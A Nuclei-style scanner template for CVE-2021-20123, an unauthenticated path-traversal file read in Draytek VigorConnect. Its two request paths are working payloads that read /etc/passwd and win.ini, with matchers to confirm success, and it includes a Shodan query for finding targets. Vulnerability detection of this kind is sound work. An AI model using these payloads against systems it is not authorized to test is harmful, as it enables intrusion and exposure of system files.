id: CVE-2021-20123 info: name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet author: 0x_Akoko severity: high description: | A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. reference: - https://www.tenable.com/security/research/tra-2021-42 - https://www.cvedetails.com/cve/CVE-2021-20123/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-20123 cwe-id: CWE-22 metadata: verified: true shodan-query: http.html:"VigorConnect" tags: cve,cve2021,draytek,lfi,vigorconnect requests: - method: GET path: - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything" - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything" stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or - type: word part: header words: - "application/octet-stream" - type: status status: - 200